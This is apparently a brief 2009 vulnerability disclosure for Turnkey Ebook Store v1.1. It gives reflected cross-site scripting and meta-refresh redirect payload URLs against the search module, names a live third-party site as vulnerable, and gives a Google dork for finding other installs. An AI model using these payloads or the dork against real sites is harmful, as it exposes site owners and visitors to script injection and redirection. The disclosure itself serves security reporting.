Turnkey Ebook Store version 1.1 suffers from cross site scripting and redirection vulnerabilities.
0ff858011fd581f1e4c9ee6d8b6321636d4e387d18de3a82b24c22ac51e6f2d0
Turnkey Ebook Store v1.1 - Cross site Scripting and Redirect
Link: http://www.privatelabelresellrights-store.com/ebookstore/
- 31-03-2009
- Methodman - http://nemesis.te-home.net
- Vulnerability was found on search module.
example:
- http://site.com/index.php?cmd=search&keywords="><script>alert('XSS')</script>
- http://site.com/index.php?cmd=search&keywords=<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">
live:
- http://1dollar-ebookstore.com/index.php?cmd=search&keywords="><script>alert('XSS')</script>
Google dork: - Powered by Turnkey Ebook Store v1.1
/teamelite